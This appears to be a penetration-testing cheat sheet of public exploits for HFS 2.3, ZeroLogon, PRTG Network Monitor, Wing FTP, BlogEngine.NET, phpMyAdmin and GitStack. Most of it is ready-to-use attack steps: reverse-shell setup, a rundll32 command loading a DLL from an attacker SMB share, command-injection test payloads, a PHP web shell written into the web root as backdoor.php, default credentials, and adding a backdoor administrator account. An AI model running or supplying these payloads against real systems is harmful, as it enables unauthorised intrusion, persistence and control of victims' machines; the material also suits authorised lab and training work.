Public Exploits
CVE-2019-1388: Windows Privilege Escalation Through UAC
Rejetto HTTP File Server RCE [HFS 2.3]
Exploit: https://www.exploit-db.com/exploits/39161
Host
/usr/share/windows-resources/binaries/nc.exe
on attacker's web-server and set-up listener.Modify hfsexploit.py with Attacker's IP and Reverse shell Listening Port
Run exploit :
python hfsexploit.py <target-IP> <target-port>
Zero Logon [CVE-2020-1472]
Write-up :https://dirkjanm.io/a-different-way-of-abusing-zerologon/
Exploit: https://github.com/dirkjanm/CVE-2020-1472
In case of error, run the following code:
PRTG Network Monitor [<18.2.39]
Default credentials :
prtgadmin:prtgadmin
Authenticated RCE Writeup : https://www.codewatch.org/blog/?p=453
Automated Exploit
Link: https://raw.githubusercontent.com/M4LV0/PRTG-Network-Monitor-RCE/master/prtg-exploit.sh
Adds a user to Administrators Group : pentest::P3nT3st
Login to the app, grab your cookie and add it to the script.
./exploit.sh -u <Target> -c "<Cookie-value>"
Modify for Reverse Shell
Let's use metasploit smb_delivery to share the payload via Port 445.
In
exploit.sh
, search forpentest
to identify payload.Replace payload code.[ URL Encode payload]
rundll32.exe \10.10.0.172\pbMaor\memorycache.dll,0
Encoded:
rundll32.exe%20%5C%5C10.10.0.172%5CpbMaor%5Cmemorycache.dll%2C0%0A
Manual Exploit
Testing for code execution
Setup -> Account Settings -> Notifications
Parameter: Test;
ping -n 1 <IP>
On Kali Machine:
sudo tcpdump -i tun0 ip proto \\icmp -vv
Use Powershell one-liners for gaining a foothold.
Wing FTP Authenticated RCE
Testing for code execution :
s
sudo tcpdump -i tun0 ip proto \\icmp -vv
os.execute('cmd.exe /c ping -n 1 <IP>')
Try with Metasploit :
use multi/script/web_delivery
set target 3
BlogEngine.NET
RCE Affected versions: <3.3.6.0
CVE-2019-6714
Exploit Write-up : https://blog.gdssecurity.com/labs/2019/3/28/remote-code-execution-in-blogenginenet.html
PHPMyAdmin
Requires the phpmyadmin page to be accessible.
Steps to get a reverse shell:
Create a new database, and insert the following query :
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\xampp\htdocs\backdoor.php"
GitStack RCE
Identify Repository:
GET /rest/repository/
Identify Users:
GET /rest/user/
Code Execution on
password
parameter: Use Burp to intercept Basic Auth request:
Last updated